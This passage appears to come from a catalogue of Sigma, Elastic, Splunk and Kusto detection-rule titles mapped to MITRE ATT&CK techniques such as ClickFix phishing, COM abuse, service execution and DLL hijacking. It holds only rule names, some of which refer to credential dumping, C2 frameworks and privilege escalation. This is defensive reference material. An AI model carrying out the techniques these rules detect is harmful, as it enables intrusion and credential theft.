- Splunk Windows Suspect Process With Authentication Traffic production
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows Universal Data Link File Creation production
- Splunk Windows User Execution Malicious URL Shortcut File production
User Execution: Malicious Copy and Paste T1204.004 8 rules
- Sigma FileFix - Command Evidence in TypedPaths experimental
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Suspicious ClickFix/FileFix Execution Pattern experimental
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious FileFix Execution Pattern experimental
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
Inter-Process Communication T1559 24 rules
- Sigma CMSTP Execution Process Access stable
- Sigma Dllhost.EXE Initiated Network Connection To Non-Local IP Address test
- Sigma DNS Query Request By Regsvr32.EXE test
- Sigma Enable Microsoft Dynamic Data Exchange test
- Elastic Execution of COM object via Xwizard production
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Potential Command and Control via Internet Explorer production
- Splunk Process Writing DynamicWrapperX production
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious Explorer Child Process production
- Elastic Suspicious Inter-Process Communication via Outlook production
- Kusto Suspicious named pipes available
- Sigma Trickbot Malware Activity stable
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
- Splunk Windows Anonymous Pipe Activity production
- Splunk Windows PUA Named Pipe production
- Splunk Windows RMM Named Pipe production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
Inter-Process Communication: Component Object Model T1559.001 16 rules
- Sigma CMSTP Execution Process Access stable
- Sigma Dllhost.EXE Initiated Network Connection To Non-Local IP Address test
- Sigma DNS Query Request By Regsvr32.EXE test
- Elastic Execution of COM object via Xwizard production
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Potential Command and Control via Internet Explorer production
- Splunk Process Writing DynamicWrapperX production
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious Explorer Child Process production
- Elastic Suspicious Inter-Process Communication via Outlook production
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
Inter-Process Communication: Dynamic Data Exchange T1559.002 1 rule
- Sigma Enable Microsoft Dynamic Data Exchange test
System Services T1569 88 rules
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma CSExec Service File Creation test
- Sigma CSExec Service Installation test
- Sigma CVE-2021-1675 Print Spooler Exploitation test
- Sigma CVE-2021-1675 Print Spooler Exploitation IPC Access test
- Splunk Detect Renamed PSExec production
- Kusto Dev-0228 File Path Hashes November 2021
- Kusto Dev-0228 File Path Hashes November 2021 (ASIM Version)
- Sigma DNS RCE CVE-2020-1350 test
- Splunk Excessive Usage Of SC Service Utility production
- Splunk First Time Seen Running Windows Service experimental
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma HackTool Service Registration or Execution test
- Splunk Impacket PSexec (Windows Event Log)
- Splunk Impacket SMBexec (Windows Event Log)
- Sigma KrbRelayUp service installation (native) experimental
- Splunk Malicious Powershell Executed As A Service production
- Sigma Massive remote service creation via named pipes (TChopper, CME) experimental
- Sigma Massive remote service creation via named pipes - Tchopper experimental
- Sigma Massive service installation - Tchopper experimental
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma PAExec Service Installation test
- Sigma Possible CVE-2021-1675 Print Spooler Exploitation test
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential CVE-2022-26809 Exploitation Attempt test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma PowerShell as a Service in Registry test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Scripts Installed as Services test
- Sigma PowerShell Scripts Installed as Services - Security test
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSExec and WMI Process Creations Block test
- Sigma PSexec application execution experimental
- Sigma PsExec Default Named Pipe test
- Sigma Psexec Execution test
- Elastic PsExec Network Connection production
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PsExec Service File Creation test
- Sigma PsExec Service Installation test
- Sigma PsExec Tool Execution From Suspicious Locations - PipeName test
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - CsExec Execution test
- Sigma PUA - NirCmd Execution test
- Sigma PUA - NirCmd Execution As LOCAL SYSTEM test
- Sigma PUA - NSudo Execution test
- Sigma PUA - PAExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Sigma PUA - RunXCmd Execution test
- Sigma RemCom Service File Creation test
- Sigma RemCom Service Installation test
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Sigma Remote service creation via named pipes experimental
- Elastic Remote Windows Service Installed production
- Elastic Remotely Started Services via RPC production
- Sigma Renamed Procdump tool used for dumping LSASS process experimental
- Sigma Rundll32 Execution Without Parameters test
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Service Created containing Command Shell (Windows Event Log)
- Splunk Service Installed (Windows Event Log)
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma smbexec.py Service Installation test
- Sigma Start Windows Service Via Net.EXE test
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Elastic System Shells via Services production
- Elastic Unsigned DLL Loaded by Svchost production
- Sigma WFP Filter Added via Registry experimental
- Splunk Windows ScManager Security Descriptor Tampering Via Sc.EXE production
- Splunk Windows Service Create SliverC2 production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Created with Suspicious Service Name production
- Splunk Windows Service Created with Suspicious Service Path production
- Splunk Windows Service Execution RemCom production
- Splunk Windows Service Started (PowerShell)
- Splunk Windows Service Started (Sysmon)
- Splunk Windows Service Started (Windows Event Log)
- Splunk Windows Snake Malware Service Create production
System Services: Service Execution T1569.002 76 rules
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma CSExec Service File Creation test
- Sigma CSExec Service Installation test
- Splunk Detect Renamed PSExec production
- Sigma DNS RCE CVE-2020-1350 test
- Splunk Excessive Usage Of SC Service Utility production
- Splunk First Time Seen Running Windows Service experimental
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma HackTool Service Registration or Execution test
- Splunk Impacket PSexec (Windows Event Log)
- Splunk Impacket SMBexec (Windows Event Log)
- Splunk Malicious Powershell Executed As A Service production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma PAExec Service Installation test
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential CVE-2022-26809 Exploitation Attempt test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma PowerShell as a Service in Registry test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Scripts Installed as Services test
- Sigma PowerShell Scripts Installed as Services - Security test
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSExec and WMI Process Creations Block test
- Sigma PSexec application execution experimental
- Sigma PsExec Default Named Pipe test
- Elastic PsExec Network Connection production
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PsExec Service File Creation test
- Sigma PsExec Service Installation test
- Sigma PsExec Tool Execution From Suspicious Locations - PipeName test
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - CsExec Execution test
- Sigma PUA - NirCmd Execution test
- Sigma PUA - NirCmd Execution As LOCAL SYSTEM test
- Sigma PUA - NSudo Execution test
- Sigma PUA - PAExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Sigma PUA - RunXCmd Execution test
- Sigma RemCom Service File Creation test
- Sigma RemCom Service Installation test
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote Windows Service Installed production
- Elastic Remotely Started Services via RPC production
- Sigma Renamed Procdump tool used for dumping LSASS process experimental
- Sigma Rundll32 Execution Without Parameters test
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Service Created containing Command Shell (Windows Event Log)
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma smbexec.py Service Installation test
- Sigma Start Windows Service Via Net.EXE test
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Elastic System Shells via Services production
- Elastic Unsigned DLL Loaded by Svchost production
- Sigma WFP Filter Added via Registry experimental
- Splunk Windows ScManager Security Descriptor Tampering Via Sc.EXE production
- Splunk Windows Service Create SliverC2 production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Created with Suspicious Service Name production
- Splunk Windows Service Created with Suspicious Service Path production
- Splunk Windows Service Execution RemCom production
- Splunk Windows Service Started (PowerShell)
- Splunk Windows Service Started (Sysmon)
- Splunk Windows Service Started (Windows Event Log)
- Splunk Windows Snake Malware Service Create production
Hijack Execution Flow T1574 183 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Kusto COM Registry Key Modified to Point to File in Color Profile Folder
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Adobe Hijack Persistence production
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Sigma DLL Execution Via Register-cimprovider.exe test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Enabling COR Profiler Environment Variables test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Sigma Fax Service DLL Search Order Hijack test
- Splunk GitHub Workflow File Creation or Modification production
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Sigma Potential PlugX Activity test
- Sigma Potential PrintNightmare Exploitation Attempt test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential Registry Persistence Attempt Via DbgManagedDebugger test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry-Free Process Scope COR_PROFILER test
- Sigma Regsvr32 DLL Execution With Uncommon Extension test
- Sigma Renamed Vmnat.exe Execution test
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Setup16.EXE Execution With Custom .Lst File test
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware CommandLine Indicator test
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Sigma Suspicious Printer Driver Empty Manufacturer test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Elastic Unusual Persistence via Services Registry production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows BitDefender Submission Wizard DLL Sideloading experimental
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows Potential AppDomainManager Hijack Artifacts Creation production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows Rundll32 Execution With Log.DLL production
- Splunk Windows Service Creation Using Registry Entry production
- Splunk Windows Set Custom DNS ServerLevelPlugin Via Dnscmd production
- Sigma Windows Spooler Service Suspicious Binary Load test
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL T1574.001 118 rules
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Fax Service DLL Search Order Hijack test
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential PlugX Activity test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Renamed Vmnat.exe Execution test
- Sigma Small Sieve Malware CommandLine Indicator test
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL Side-Loading T1574.002 10 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Hijack Execution Flow: Dylib Hijacking T1574.004 1 rule
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Executable Installer File Permissions Weakness T1574.005 2 rules
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma Setup16.EXE Execution With Custom .Lst File test
Hijack Execution Flow: Dynamic Linker Hijacking T1574.006 2 rules
- Splunk GitHub Workflow File Creation or Modification production
- Splunk Shai-Hulud Workflow File Creation or Modification production
Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 5 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
Hijack Execution Flow: Path Interception by Search Order Hijacking T1574.008 6 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
Hijack Execution Flow: Path Interception by Unquoted Path T1574.009 4 rules
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Services File Permissions Weakness T1574.010 6 rules
- Elastic Deprecated - Adobe Hijack Persistence production
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
Hijack Execution Flow: Services Registry Permissions Weakness T1574.011 17 rules
